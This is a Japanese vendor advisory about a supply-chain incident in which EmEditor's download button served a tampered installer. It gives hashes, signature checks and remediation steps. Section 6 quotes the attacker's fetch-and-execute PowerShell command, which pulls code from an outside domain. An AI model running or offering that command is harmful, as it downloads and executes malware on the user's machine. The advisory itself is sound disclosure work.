Emurasoft logo

【重要】EmEditor インストーラーのダウンロード導線に関するセキュリティ インシデントのお知らせ

/カテゴリ: /作成者:

平素より EmEditor をご利用いただき、誠にありがとうございます。

誠に遺憾ながら、EmEditor 公式サイトにおけるダウンロード導線(ホームページ上の [今すぐダウンロード] ボタン)に関し、第三者による改変が疑われる事象を確認いたしました。
該当期間中に当該ボタンからダウンロードされたインストーラーが、弊社(Emurasoft, Inc.)が提供する正規ファイルではない可能性があります。

お客様には多大なるご心配とご迷惑をお掛けしておりますことを、深くお詫び申し上げます。以下の内容をご確認ください。

1. 影響が発生した可能性のある期間

  • 2025年12月20日 11:39 〜 2025年12月23日 05:50 (日本時間)

上記期間中に、EmEditor ホームページ上の [今すぐダウンロード] ボタンからインストーラーをダウンロードされた場合、弊社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があります。これは広めに見積もっており、実際には、これよりも狭い特定の期間であった可能性があります。

2. 事象の概要(原因の概要)

ホームページの [今すぐダウンロード] ボタンのリンク先は通常、次の URL です。

  • https://support.emeditor.com/ja/downloads/latest/installer/64

この URL はリダイレクト(転送)設定になっていますが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なる URL である下記からファイルがダウンロードされる状態となっていました。

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

当該ファイルは弊社が作成したものではなく、現在は削除済みです。

その結果、ダウンロードされたファイルには弊社の署名ではなく、WALSHAM INVESTMENTS LIMITED という別組織のデジタル署名が付与されていることを確認しています。

※本件は日本語ページに限らず、以下のような他言語ページの同種 URL も影響を受ける可能性があります。

  • https://support.emeditor.com/en/downloads/latest/installer/64 (ほか)

3. 影響が確認されているファイル

現時点で影響が確認されているのは、次のファイルのみです。

  • emed64_25.4.3.msi

正しいファイル(弊社正規)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,376,832 bytes
  • デジタル署名: Emurasoft, Inc.
  • SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

問題のあるファイル(改ざんの可能性)

  • ファイル名: emed64_25.4.3.msi
  • サイズ: 80,380,416 bytes
  • デジタル署名: WALSHAM INVESTMENTS LIMITED

4. 影響を受けないケース

以下の場合は、本件の影響を受けません

  • EmEditor の 更新チェッカー(Update Checker) から更新した場合、または EmEditor により自動更新が行われた場合
  • download.emeditor.info から直接ダウンロードされた場合
    例: https://download.emeditor.info/emed64_25.4.3.msi
  • emed64_25.4.3.msi 以外のファイル
  • ポータブル版
  • ストア アプリ版
  • winget を利用してインストール/更新した場合
  • 問題のファイルをダウンロードしていたとしても、当該ファイルを実行していない場合

5. 該当する可能性がある場合の確認方法とお願い

上記期間中に [今すぐダウンロード] からインストーラーを入手された可能性がある場合は、ダウンロードした emed64_25.4.3.msiデジタル署名および SHA-256 をご確認ください。
(可能であれば、インストール/実行の有無もあわせてご確認ください。)

5-1. デジタル署名の確認手順(Windows)

  1. 対象ファイル(emed64_25.4.3.msi)を右クリックし、[プロパティ] を開きます。
  2. [デジタル署名] タブを開きます。
  3. 署名者名(Signer / 署名者)が Emurasoft, Inc. であることを確認してください。
  • WALSHAM INVESTMENTS LIMITED となっている場合、問題のあるファイルの可能性があります。

※「デジタル署名」タブが表示されない場合、署名が付与されていない、または正しく認識できない可能性があります。その場合も、当該ファイルは実行せず削除し、後述の対応をご検討ください。

5-2. SHA-256 の確認手順(Windows / PowerShell)

PowerShell を開き、次を実行してください。

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

出力された SHA-256 が次と一致することをご確認ください。

  • 正規ファイルの SHA-256:
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

署名または SHA-256 が一致しない場合(推奨対応)

デジタル署名が Emurasoft, Inc. ではなく WALSHAM INVESTMENTS LIMITED となっている場合、または SHA-256 が一致しない場合、改ざんされたファイル(マルウェアを含む可能性のあるファイル)を入手された恐れがあります。

  • 直ちに当該コンピューターを ネットワークから切り離す(有線/無線の遮断)
  • コンピューター全体の マルウェア スキャンを実施する
  • 状況により、可能であれば OS を含む環境のリフレッシュ/再構築をご検討ください
  • 当該端末で利用・保存していた情報が漏えいしている可能性も考慮し、各種サービスの パスワード変更(必要に応じて多要素認証の有効化)をご検討ください

※企業・組織でご利用の場合は、可能な範囲で 社内のセキュリティ担当部門(CSIRT 等)への連絡も推奨いたします。

6. 現時点で確認されている挙動について

本件で問題となる可能性のあるインストーラーは、実行時に次のコマンドを実行しようとします。危険ですので、このコマンドは絶対に実行しないでください。

  • powershell.exe "irm emeditorjp.com | iex"

このコマンドは emeditorjp.com からファイルを取得して実行するものです。
emeditorjp.com は弊社が管理するドメインではありません。

また、当該インストーラーは EmEditor 本体のインストール自体は正常に進み、正規の EmEditor ファイルがインストールされるため、問題に気付きにくい可能性があります。

7. 現在の対応状況と今後のご報告

現在、事実関係の確認および影響範囲の調査を継続しております。進展があり次第、本ページ等にて速やかにご報告いたします。
弊社では本事象を厳粛に受け止め、原因究明と再発防止に向けて必要な対策を講じてまいります。

このたびは、皆様に多大なるご迷惑とご心配をお掛けしましたことを、重ねて深くお詫び申し上げます。
今後とも EmEditor をよろしくお願い申し上げます。

次も気に入っていただけるかもしれません。
Emurasoft logo本サイトのハッカーによる攻撃について
Emurasoft logoクリーン アップ作業が終了しました
Emurasoft logoEmEditor 更新チェックによるウィルス感染の可能性について
Emurasoft logo今回のハッカーによる攻撃の詳細について
Emurasoft logo今回のハッカーによる攻撃の詳細の続報
Emurasoft logoEmEditor ホームページ全体が SSL 暗号化通信に移行しました
Emurasoft logo今回のハッキングの事件についての調査結果のご報告
Emurasoft logov14.6 の特長のページを追加しました